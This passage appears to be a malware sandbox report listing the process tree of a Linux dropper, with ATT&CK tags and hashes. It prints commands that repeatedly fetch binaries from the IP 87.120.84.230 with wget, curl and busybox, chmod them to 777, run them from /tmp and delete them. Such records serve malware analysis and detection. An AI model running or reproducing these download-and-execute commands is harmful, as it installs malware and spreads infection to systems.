/tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz./D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:1664
-
-
/bin/chmodchmod 777 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm./pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:1670
-
-
/bin/chmodchmod 777 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ./JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:1673
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:1674
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Writes file to tmp directory
PID:1675
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:1676
-
-
/bin/chmodchmod 777 FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- File and Directory Permissions Modification
PID:1677
-
-
/tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V./FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Executes dropped EXE
PID:1678
-
-
/bin/rmrm FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:1679
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:1680
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Writes file to tmp directory
PID:1681
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:1682
-
-
/bin/chmodchmod 777 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- File and Directory Permissions Modification
PID:1683
-
-
/tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN./yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Executes dropped EXE
PID:1684
-
-
/bin/rmrm yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:1685
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:1686
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Writes file to tmp directory
PID:1687
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:1688
-
-
/bin/chmodchmod 777 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- File and Directory Permissions Modification
PID:1689
-
-
/tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I./vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Executes dropped EXE
PID:1690
-
-
/bin/rmrm vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:1691
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97